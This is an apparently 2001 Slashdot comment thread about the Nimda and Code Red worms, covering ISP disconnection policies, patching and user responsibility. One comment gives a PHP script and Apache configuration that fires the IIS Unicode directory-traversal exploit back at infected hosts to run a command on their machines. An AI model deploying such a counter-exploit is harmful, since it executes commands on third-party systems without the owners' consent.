      So, anyways, the purpose of this post is (a) any unpatched, misconfigured system is open to viruses and worms, (b) windows doesn't require thousands of dollars of software to be usable, (c) people do pay for windows, and (d) viruses, for the average informed windows user is not a threat.

      Just my $.02

  • There are three feasible alternatives which high-speed ISPs could take that I can see:

    - Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.

    - Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).

    - Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so much problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.

    I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.
  • When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?
  • i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.

    however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.

    i give up.
  • Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.

    A person who runs a web server has to defend himself fromm all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it all but then what can protect him from wet slopes in stormy weather?

    Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.

    I live in Israel. In the last few days I've been getting quite a lot of internal ISP trafic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.

  • Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
    I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. Its the users who have the problem. Not that MS is blameless, but calm down before you flame.

    I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.

    If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at would be laughing it up, whining about how Linus doesn't do enough QA, even though its the users fault.

    As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.

    Anyway, thats enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.

  • "Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."

    1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.

    2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!
  • yesterday, I posted a slashdot comment [] that said exactly this.

    give credit where credit is due, please.

  • The other day I received an e-mail from a relation of mine which was the SirCam virus in all it glory. Luckily for me I don't use or Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing they came back to me telling me dispite getting the latest anti-virus update nothing could be detected.

    Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.

    So here is the problem, what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed infected computers are going to stay infected long after the fix is available.

    Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.
  • by tommyServ0 ( 266153 ) on Friday September 21, 2001 @10:32AM (#2329699) Homepage Journal
    I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

    /* Open a connection to the offender */
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
    /* Check to see if the connection actually opened */
    if ($fp)
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit for more information.");
    /* ...and send it */
    fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
    /* close the connection (though it probably got closed automatically) */
    fclose ($fp);

    /* for fun and confusion.. */
    header ("HTTP/1.0 404");

    echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
    echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
    echo ("<h1>Not Found</h1>\n");
    echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
    echo ("</body></html>\n");
    echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
    echo ("</body></html>\n");

    $res = "dirty\r\n";
    $log = fopen("/tmp/nimda.log", "a");
    fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);

    Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?

    Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:

    AddType application/x-httpd-php .php .php3 .exe

    Now restart Apache by issuing one of either:
    /etc/rc.d/init.d/httpd restart
    apachectl restart

    That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimba.log.
  • People have commented that without an Internet connection, the problem will be hard to fix. Why? Because Microsoft requires infected and at-risk systems be on the Internet to download patches. If Microsoft had done the respectable thing and mailed out patch CDs to registered users (and maybe even given them away at computer stores), much of this could have been avoided.
  • I got an E-mail from Speakeasy yesterday stating that anyone infected with Nimbda will be cut off on the 23rd. Bummer for the Windows users. Now some ranting. The more sensitive members of the audience might want to turn away now...

    I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.

    And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm start spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too and if he's not doing his job well, his bonus and possibly his job should be impacted.

Machines that have broken down will work perfectly when the repairman arrives.